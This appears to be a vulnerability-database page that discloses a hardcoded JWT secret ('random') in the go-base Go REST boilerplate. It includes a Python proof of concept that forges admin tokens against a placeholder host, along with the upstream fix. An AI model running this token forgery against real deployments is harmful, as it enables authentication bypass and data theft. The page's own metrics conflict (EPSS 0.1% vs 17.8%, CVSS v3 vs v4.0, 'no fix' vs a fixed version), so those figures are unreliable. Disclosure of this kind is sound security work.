CVE-2026-48031

CRITICALPre-NVD 9.19.1
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.1 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.1%, top 82% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
9.1
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 9.1Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Go Restful API Boilerplate: Hardcoded JWT Secret "random" Allows Token Forgery

Vulnerability: CWE-798 — Hardcoded JWT Secret + Broken Mitigation

Affected Component

  • github.com/dhax/go-base — Go REST API boilerplate (go-chi/jwtauth/v5, Viper, PostgreSQL/Bun)
  • 1,685 stars on GitHub

Vulnerability Locations

| File | Line | Role | |------|------|------| | dev.env | 10 | AUTH_JWT_SECRET=random — template default shipped to all users | | cmd/serve.go | 35 | viper.SetDefault("auth_jwt_secret", "random") — code-level fallback | | auth/jwt/tokenauth.go | 22-25 | Weak mitigation: only checked literal "random", auto-generated non-persistent key | | auth/jwt/tokenauth.go | 28 | jwtauth.New("HS256", []byte(secret), nil) — creates JWT signer with the weak key | | pwdless/api.go | 203 | GenTokenPair() — issues access + refresh tokens signed with the weak key |

Data Flow

dev.env AUTH_JWT_SECRET=random
  OR
cmd/serve.go viper.SetDefault("auth_jwt_secret", "random")
    │
    ▼
auth/jwt/tokenauth.go: viper.GetString("auth_jwt_secret")
    │
    ▼
auth/jwt/tokenauth.go: jwtauth.New("HS256", []byte(secret), nil)
    │
    ▼
pwdless/api.go: GenTokenPair() → access + refresh tokens
    │
    ▼
jwt/authenticator.go: Every authenticated request trusts the forged token

Description

The JWT signing secret is hardcoded to the string "random" in two independent locations:

  • dev.env:10 — The template .env file sets AUTH_JWT_SECRET=random. Every developer who copies this template gets the same default.
  • cmd/serve.go:35viper.SetDefault("auth_jwt_secret", "random") provides a programmatic fallback. Even if the .env file is missing entirely, the application silently starts with "random" as the signing key.

The original code contained a mitigation in auth/jwt/tokenauth.go:22-25 that checked if the secret equaled "random" and replaced it with a randomly-generated 32-byte string. This mitigation had two fatal flaws:

  • (a) Single-value check: Only the exact string "random" was caught. Any other weak secret (e.g., "secret", "changeme", empty string) passed through unchecked.
  • (b) Non-persistent replacement: The auto-generated key was stored only in memory (randStringBytes(32)), not persisted. On every restart, all existing tokens became invalid without warning, breaking all active user sessions. This made the "fix" itself a denial-of-service.

An attacker who reads the public repository knows the signing key is "random". They can forge JWT tokens for arbitrary users (including admin roles), gaining complete authentication bypass on all protected API endpoints.

Proof of Concept

import jwt
import requests

The hardcoded secret from dev.env / serve.go (public repository)

SECRET = "random" BASE_URL = "http://target:3000"

Step 1: Forge an admin JWT token

payload = { "sub": "admin@example.com", "roles": ["admin"], "iat": 9999999000, "exp": 9999999999 } forged_token = jwt.encode(payload, SECRET, algorithm="HS256")

Step 2: Access any protected endpoint with the forged token

headers = {"Authorization": f"Bearer {forged_token}"}

List all users (requires admin)

r = requests.get(f"{BASE_URL}/api/v1/admin/users", headers=headers) print(f"Status: {r.status_code}") # 200 OK

Access own profile with forged identity

r = requests.get(f"{BASE_URL}/api/v1/me", headers=headers) print(f"Profile: {r.json()}") # Returns admin@example.com profile

The forged token is also accepted by refresh endpoints

r = requests.post(f"{BASE_URL}/api/v1/token/refresh", headers=headers)

Returns a new valid token signed with the same "random" secret

Impact

  • Authentication Bypass: Forge tokens for any user, including admin roles
  • Confidentiality: Access all user data, profiles, and protected resources
  • Integrity: Modify any data accessible via the API
  • Persistence: Forged tokens remain valid until expiry (or indefinitely via refresh)

Fix (PR #31)

The fix replaced the single-value check with a comprehensive approach:

// BEFORE (tokenauth.go:22-25) — weak, single-value check
if secret == "random" {
    secret = randStringBytes(32) // non-persistent, breaks on restart
}

// AFTER — comprehensive known-weak-secrets map var knownWeakSecrets = map[string]bool{ "random": true, "secret": true, "changeme": true, "change-me": true, "default": true, "": true, }

if knownWeakSecrets[secret] { log.Fatal("JWT secret is a known weak value. Please set a strong AUTH_JWT_SECRET.") }

Plus: minimum 32-character length check, removal of non-persistent auto-generation, and clear generation instructions (openssl rand -base64 32) in the template.

Patched Versions

  • All versions after commit range including PR#31 (merged May 17, 2026).
  • Users should update to the latest master, regenerate their JWT secret, and restart.

Resources

  • Fix PR: https://github.com/dhax/go-base/pull/31
  • Commit history: https://github.com/dhax/go-base/commits/master

Credit

Reported by @saaa99999999 via manual security audit.

CVSS v3
9.1
EG Score
9.1(low)
EG Risk
45(Track)
EG Risk 45/100SSVC: Track

EG Risk is EchelonGraph's 0–100 priority score: it fuses intrinsic severity with real-world exploitation and automatability so you can rank equal-severity CVEs and fix the most dangerous first. Higher = act sooner. Distinct from the 0–10 EG Score (severity).

How it’s computed
Severity91% × 45%
Exploitation0% × 40%
Automatability30% × 15%
Action: Routine — remediate on your standard cadence.
EPSS
17.8%
KEV
Not listed

Published

June 10, 2026

Last Modified

June 10, 2026

Vendor Advisories for CVE-2026-48031(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Go(1)
PackageVulnerable rangeFixed inDependents
github.com/dhax/go-base0.0.0-20260517152733-cc82b9740fa6

Data Freshness Timeline

(refreshed 1× in last 7d / 1× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-23 03:18 UTCEG score recompute
  2. 2026-06-14 23:18 UTCEPSS rescore
  3. 2026-06-13 23:00 UTCEPSS rescore
  4. 2026-06-12 23:12 UTCEPSS rescore
  5. 2026-06-10 14:17 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-48031?
CVE-2026-48031 is a critical vulnerability published on June 10, 2026. Go Restful API Boilerplate: Hardcoded JWT Secret "random" Allows Token Forgery Vulnerability: CWE-798 — Hardcoded JWT Secret + Broken Mitigation Affected Component github.com/dhax/go-base — Go REST API boilerplate (go-chi/jwtauth/v5, Viper, PostgreSQL/Bun) 1,685 stars on GitHub Vulnerability…
When was CVE-2026-48031 disclosed?
CVE-2026-48031 was first published in the National Vulnerability Database on June 10, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-48031 actively exploited?
CVE-2026-48031 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 17.8% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-48031?
CVE-2026-48031 has a CVSS v4.0 base score of 9.1 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-48031?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-48031, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-48031

Explore →

Is Your Infrastructure Affected by CVE-2026-48031?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.